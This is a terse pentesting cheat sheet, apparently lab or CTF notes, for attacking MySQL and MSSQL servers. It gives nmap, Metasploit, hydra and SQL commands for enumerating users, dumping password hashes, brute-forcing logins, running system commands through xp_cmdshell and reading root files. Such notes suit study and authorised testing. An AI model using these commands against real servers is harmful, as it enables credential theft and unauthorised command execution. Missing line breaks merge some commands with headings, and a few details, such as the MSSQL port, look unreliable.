Mysql and Mssql
mysql (port 3306) ....... mssql(port 1443)
connect
mysql -h $IP -u $username -p$passwordnmap
imp cmd :
nmap -p3306 $IP -sCVto enum other users on mysql (you'll need access & password of that user)
nmap -p3306 $IP --script mysql-users \
--script-args="mysqluser='username',mysqlpass=''"dump hashes
nmap -p3306 $IP --script mysql-dump-hashes \
--script-args="username='username',password=''"
# --script ms-sql-dump-hashes to check all the imp variables
nmap -p3306 $IP --script mysql-variables \
--script-args="mysqluser='username',mysqlpass=''"audit the database (GOOD & IMP)
nmap -p3306 $IP --script mysql-audit \
--script-args="mysql-audit.username='username',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"run sql query with nmap
nmap -p3306 $IP --script mysql-query \
--script-args="query='select * from tablename;'username='username',password=''"mysql info
nmap -p$port $IP --script ms-sql-infontlm info
nmap -p$port $IP --script ms-sql-ntlm-info --script-args mysql.instance-port=$portbruteforce ms-sql
nmap -p$port $IP --script ms-sql-bruteforce \
--script-args userdb=/path/to/users,passdb=/path/to/passwords.txtempty passwords
nmap -p$port $IP --script ms-sql-empty-passwordrun query (ms sql) -> show logs : logins, what service are running etc.
nmap -p$port $IP --script ms-sql-query \
--script-args mssql.username='user',mssql.password='pass', \
ms-sql-query.query="SELECT * from master..syslogins" -oN out.txtrun windows cmds with ms sql
nmap -p$port $IP --script ms-sql-xp-cmdshell \
--script-args mssql.username='user',mssql.password='pass', \
ms-sql-xp-cmdshell.cmd="ipconfig"metasploit / msfconsole
to see what directories are writeable
use auxiliary/scanner/mysql/mysql_writeable_dirs
#Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE
set dir_list /path/to/wordlists.txt
set rhosts $IP
set verbose false
set password $password
#set password "" .....if empty passwordhashdump
use auxiliary/scanner/mysql/mysql_hashdump
set username $username
set password $password # "" if no pass/empty pass
rundictionary attack
use auxiliary/scanner/mysql/mysql_login
#for mssql
#use auxiliary/scanner/mssql/mssql_login
set rhosts $IP
set pass_file /path/to/wordlists.txt
set stop_on_sucess true
runadmin scan
use auxiliary/admin/mssql/mssql_enum
#the mssql_enum is an admin module that will accept a set of
#credentials and query a MSSQL for various configuration settings.
#set all the required optionsobtain all logins
use auxiliary/scanner/admin/mssql/mssql_enum_sql_logins
#This module can be used to obtain a list of all logins from a SQL Server with any login.
#Selecting all of the logins from the master..syslogins table is restricted to sysadmins
#set required optionsrun commands
use auxiliary/scanner/admin/mssql/mssql_exec
#set required options
set cmd ipconfig
rundomain accounts scan
use auxiliary/scanner/admin/mssql/mssql_enum_domain_accounts
#set required optionsmysql cmds
to load files (if we have access to)
mysql> select load_file("/root/root.txt");hydra
hydra -l $username -P /path/to/pass/wordlist $IP mysql Last updated